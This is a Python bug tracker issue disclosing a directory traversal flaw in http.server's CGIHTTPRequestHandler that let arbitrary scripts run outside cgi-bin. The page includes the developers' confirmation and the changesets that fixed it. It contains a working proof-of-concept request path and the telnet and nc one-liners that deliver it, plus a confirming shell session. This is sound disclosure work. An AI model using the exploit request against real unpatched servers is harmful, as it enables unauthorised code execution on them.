Issue 19435: Directory traversal attack for CGIHTTPRequestHandler (original) (raw)

Created on 2013-10-29 16:34 by Alexander.Kruppa, last changed 2022-04-11 14:57 by admin. This issue is now closed.

Messages (6)

msg201645 - (view)

Author: Alexander Kruppa (Alexander.Kruppa)

Date: 2013-10-29 16:34

An error in separating the path and filename of the CGI script to run in http.server.CGIHTTPRequestHandler allows running arbitrary executables in the directory under which the server was started.

The problem is that in CGIHTTPRequestHandler we have:

def run_cgi(self):
"""Execute a CGI script."""
path = self.path
dir, rest = self.cgi_info 

  i = path.find('/', len(dir) + 1)

where path is the uncollapsed path in the URL, but cgi_info contains the first path segment and the rest from the collapsed path as filled in by is_cgi(), so indexing into path via len(dir) is incorrect.

An example exploit is giving the request path:

///////////badscript.sh/../cgi-bin/cgi.sh

Note that Firefox and wget at least simplify the path in the request; to make sure this exact path is used, do for example:

(echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1"; echo) | telnet localhost 4443

This causes the CGIHTTPRequestHandler to execute the badscript.sh file in the directory in which the server was started, so script execution is not restricted to the cgi-bin/ or htbin/ subdirectories.

msg201647 - (view)

Author: Christian Heimes (christian.heimes) * (Python committer)

Date: 2013-10-29 16:48

I can confirm the issue:

$ mkdir www $ cd www $ cat << EOF > badscript.sh #!/bin/sh echo hacked EOF $ chmod +x badscript.sh $ ../python -m http.server --cgi

$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000 HTTP/1.0 200 Script output follows Server: SimpleHTTP/0.6 Python/3.4.0a4+ Date: Tue, 29 Oct 2013 16:47:22 GMT hacked

msg201673 - (view)

Author: Benjamin Peterson (benjamin.peterson) * (Python committer)

Date: 2013-10-29 21:10

Patch

msg201747 - (view)

Author: Roundup Robot (python-dev) (Python triager)

Date: 2013-10-30 16:51

New changeset e4fe8fcaef0d by Benjamin Peterson in branch '2.7': use the collapsed path in the run_cgi method (closes #19435) http://hg.python.org/cpython/rev/e4fe8fcaef0d

New changeset b1ddcb220a7f by Benjamin Peterson in branch '3.1': use the collapsed path in the run_cgi method (closes #19435) http://hg.python.org/cpython/rev/b1ddcb220a7f

New changeset dda1a32748e0 by Benjamin Peterson in branch '3.2': merge 3.1 (#19435) http://hg.python.org/cpython/rev/dda1a32748e0

New changeset 544b654d000c by Benjamin Peterson in branch '3.3': merge 3.2 (#19435) http://hg.python.org/cpython/rev/544b654d000c

New changeset 493a99acaf00 by Benjamin Peterson in branch 'default': merge 3.3 (#19435) http://hg.python.org/cpython/rev/493a99acaf00

msg222911 - (view)

Author: Roundup Robot (python-dev) (Python triager)

Date: 2014-07-13 05:21

New changeset d367ea865ea4 by Ned Deily in branch '2.7': Issue #21323: Fix CGIHTTPServer to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/d367ea865ea4

New changeset 4de94641ba3e by Ned Deily in branch '3.2': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/4de94641ba3e

New changeset b957f475e41e by Ned Deily in branch '3.3': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/b957f475e41e

New changeset 385f4406dc26 by Ned Deily in branch '3.4': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/385f4406dc26

New changeset 22e5a85ba840 by Ned Deily in branch 'default': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/22e5a85ba840

msg222913 - (view)

Author: Ned Deily (ned.deily) * (Python committer)

Date: 2014-07-13 05:34

See Issue21323 for details of a problem introduced by the original fixes for this problem and now fixed (except for 3.1 which is now end-of-life).

History

Date

User

Action

Args

2022-04-11 14:57:52

admin

set

github: 63634

2015-10-02 00:47:18

martin.panter

link

issue14566 superseder

2014-07-13 05:34:43

ned.deily

set

nosy: + ned.deily
messages: +

2014-07-13 05:21:15

python-dev

set

messages: +

2013-11-01 00:39:27

Arfrever

set

nosy: + Arfrever

2013-10-30 16:51:29

python-dev

set

status: open -> closed

nosy: + python-dev
messages: +

resolution: fixed
stage: test needed -> resolved

2013-10-29 21:10:13

benjamin.peterson

set

files: + cgi.patch
keywords: + patch
messages: +

2013-10-29 18:49:24

janzert

set

nosy: + janzert

2013-10-29 16:54:48

glondu

set

nosy: + glondu

2013-10-29 16:51:02

barry

set

nosy: + barry

2013-10-29 16:48:40

christian.heimes

set

priority: normal -> release blocker

assignee: christian.heimes
versions: + Python 2.7, Python 3.3, Python 3.4
nosy: + larry, benjamin.peterson, georg.brandl

messages: +
stage: test needed

2013-10-29 16:35:41

vstinner

set

nosy: + vstinner, christian.heimes

2013-10-29 16:34:01

Alexander.Kruppa

create